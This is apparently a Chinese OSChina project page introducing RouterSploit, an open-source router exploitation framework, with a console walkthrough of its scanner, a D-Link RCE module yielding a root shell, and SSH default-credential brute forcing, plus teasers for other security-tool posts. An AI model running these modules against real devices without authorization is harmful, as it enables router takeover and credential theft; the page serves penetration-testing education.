RouterSploit 正在参加 2020 年度 OSC 中国开源项目评选,请投票支持!
RouterSploit 在 2020 年度 OSC 中国开源项目评选 中已获得 {{ projectVoteCount }} 票,请投票支持!
投票让它出道
已投票
RouterSploit 获得 2020 年度 OSC 中国开源项目评选「最佳人气项目」 !
RouterSploit 获得 2020 年度 OSC 中国开源项目评选「最佳人气项目」「最积极运营项目」 !
RouterSploit 获得 2020 年度 OSC 中国开源项目评选「最积极运营项目」 !

软件简介

RouteSploit框架是一款开源的漏洞检测及利用框架,其针对的对象主要为路由器等嵌入式设备。

asciicast

框架功能

RouteSploit框架主要由可用于渗透测试的多个功能模块组件组成,

1、 Scanners:模块功能主要为检查目标设备是否存在可利用的安全漏洞;

2、Creds:模块功能主要针对网络服务的登录认证口令进行检测;

3、Exploits:模块功能主要为识别到目标设备安全漏洞之后,对漏洞进行利用,实现提权等目的。

工具安装

sudo apt-get install python-requests python-paramiko python-netsnmpgit clone https://github.com/reverse-shell/routersploit ./rsf.py

GitHub地址如上命令中所述为:RouteSploit。

操作使用

首先,启动RouteSploit框架,具体如下所示

root@kalidev:~/git/routersploit# ./rsf.py 
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
     Router Exploitation Framework   |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Wildest Dreams version  : 1.0.0

rsf >

1、Scanners 模块

scanners模块,具备设备漏洞扫描功能,通过该模块,可快速识别目标设备是否存在可利用的安全漏洞,下面会以一个dlink路由器为例,结合进行操作描述。

(1)选择scanners模块,操作如下,

rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options

(2)显示选项

Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port

(3)设置目标设备IP

rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}

(4)运行模块,执行情况如下,

rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure

如上所呈现的结果,目标设备存在dwr_932_info_disclosure漏洞。接下来,我们选择合适的payload进行传递和测试(以下涉及exploits模块功能操作,如需,请再往下查阅),

6.png

2、Exploits 模块

(1)选择Exploits模块,操作如下,

rsf > use exploits/
exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/     exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

我们也可以使用“tab”键来自动补充输入命令。

(2)显示选项

rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target Port

设置选项,操作如下,

rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}

(3)运行模块

通过使用“run”或“exploit”命令来完成漏洞的利用,

rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root

也可检测目标设备是否存在选定的安全漏洞,操作如下,

rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable

(4)显示具体漏洞信息

通过“show info”命令,显示漏洞信息,包括其存在的设备品牌、型号、漏洞类型及参考来源,具体参考如下,

rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

Name:
D-LINK DIR-300 & DIR-600 RCE

Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

Targets:
- D-Link DIR 300
- D-Link DIR 600

Authors:
- Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

References:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
- http://www.s3cur1ty.de/home-Network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003

3、 Creds模块

(1)选择模块

此模块相关文件位于 /routesploit/modules/creds/ 目录下,以下为该模块支持检测的服务,

? ftp 

? ssh

? telnet

? http basic auth

? http form auth

? snmp

在检测过程中,可通过两个层面对上述的每个服务进行检测,

默认服务登录口令检测:利用框架提供的各类路由等设备以及服务的默认登录口令字典,通过快速列举的方式,可在较短时间内(几秒钟)验证设备是否仍使用默认登录口令;

暴力破解:利用框架中所提供的特定账户或者账户列表进行字典攻击。其中包含两个参数(登录账户及密码),如框架/routesploit/wordlists目录中字典所示,参数值可以为一个单词(如’admin’),或者是一整个单词列表。

(2)控制台

rsf > use creds/
creds/ftp_bruteforce         creds/http_basic_bruteforce  creds/http_form_bruteforce   creds/snmp_bruteforce        creds/ssh_default            creds/telnet_default         
creds/ftp_default            creds/http_basic_default     creds/http_form_default      creds/ssh_bruteforce         creds/telnet_bruteforce      
rsf > use creds/ssh_default
rsf (SSH Default Creds) >

(3)显示选项

5.png

(4)设置目标设备IP

rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}

(5)运行模块

rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'

(..)

Elapsed time:  38.9181981087 seconds
[+] Credentials found!

Login     Password     
-----     --------     
admin     1234         

rsf (SSH Default Creds) >

介绍内容来自 FreeBuf黑客与极客

展开阅读全文

代码

评论 (1)

加载中
工具安装中的git前面要有空格分开
2018/08/05 01:03
回复
举报
更多评论
暂无内容
发表于DevOps专区
2020/04/15 20:00

Attify 物联网渗透测试专用虚拟机

哈喽师傅们大家晚上好,今天来给大家介绍一个物联网IOT安全专用的虚拟机,它几乎把我们在做物联网渗透测试时用到的软件和环境都装好了,可以节约大量的时间。 师傅们后台回复"物联网虚拟机"获取百度云链接 系统账号密码 iot : attify 附带的工具有: Arduino Baudrate BDAddr BetterCap Binwalk Create_AP Cutter DspectrumGUI Dump1090 Firmadyne Firmware Analysis Toolkit Firmware Analysis Toolkit (FAT) Firmware-Mod-Ki...

0
0
发表了博客
2018/08/13 08:15

2018 黑帽大会 工具清单

Android,iOS和移动黑客 易受攻击的iOS应用程序:Swift版 https://github.com/prateek147/DVIA-v2 代码评估 OWASP依赖性检查 https://github.com/jeremylong/DependencyCheck 美洲狮扫描 https://github.com/pumasecurity/puma-scan 加密 DeepViolet:SSL / TLS扫描API和工具 https://github.com/spoofzu/DeepViolet 数据取证和事件响应 初学者到专家 https://github.com/bro/bro CyBot:开源威胁情报聊天机器人 https://github...

0
0
发表了博客
2018/08/09 19:38

BlackHat Arsenal USA 2018 ToolsWatch黑客工具库

原文链接:https://medium.com/hack-with-github/black-hat-arsenal-usa-2018-the-w0w-lineup-7de9b6d32796 Black Hat Arsenal USA 2018 — The w0w lineup After the huge success of Black Hat Arsenal USA 2017, @toolswatch has now announced the list of tools selected for Black Hat Arsenal USA 2018. This time there were a huge number of proposals than expected, so the Arsenal team had a tough time selec...

0
0
发表于运维专区
2020/04/01 08:00

这些年,我们一直追逐的漏洞利用神器

现在,也许我们所认为的漏洞利用工具神器,十年后,又该会是什么样子呢?可能大概就像我们现在看到以前的啊d注入工具的样子吧。 近几日,我忽然思考这样一个问题: 如果一种漏洞类型,让你推荐一款与之强相关的漏洞利用神器,你会怎么推荐? 下面,我来分享一下我心里的答案,推荐几款我认为的漏洞利用神器,欢迎各位来一起补充。 1、SQL注入漏洞 推荐项目:SQLmap 项目地址:http://sqlmap.org/ 推荐理由:殿堂级工具,注入神器...

0
0
2019/12/31 09:22

网络安全工具列表

Sec-Tools-List 主要总结渗透中利用到的一些工具,按照ATT&CK矩阵的流程进行分类,在此基础上进行了更细致的划分。一些常用的工具(Nmap、MSF、Minikatz不在记录) Initial_Access 1. 信息搜集 1.1 人员 泄露信息(浏览器、泄露数据库) datasploit theHarvester spiderfoot 社交信息 ScrapedIn:搜索 Linkedin 信息 ThreatIngestor:Twitter、RSS等 文件元数据 FOCA metagoofil MailSniper 1.2 供应链 Github 泄露敏感信息搜索...

0
2
2020/05/07 15:02

一次控制西门子PLC-300停止的攻击

声明 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 No.1 前言 PLC (Programmable Logic Controller )可编程逻辑控制器 ,简称PLC...

1
0
发表了博客
2019/02/18 00:01

1021.安全资源共享

Web安全视频 Online-Security-Videos – 红日Web安全攻防视频 Online-Security-Videos – 西安鹏程网络安全攻防课程 Online-Security-Videos – Vulhub系列视频 Online-Security-Videos – 米斯特Web安全攻防视频 Online-Security-Videos – SSRF漏洞利用与getshell实战 渗透测试靶场 WebGoat – WebGoat漏洞练习环境 Damn Vulnerable Web Application – Damn Vulnerable Web Application(漏洞练习平台) sqli-labs – 数据库注...

0
0
没有更多内容
加载失败,请刷新页面
点击加载更多
加载中
下一页
暂无内容
1 评论
166 收藏
分享
OSCHINA
登录后可查看更多优质内容
返回顶部
顶部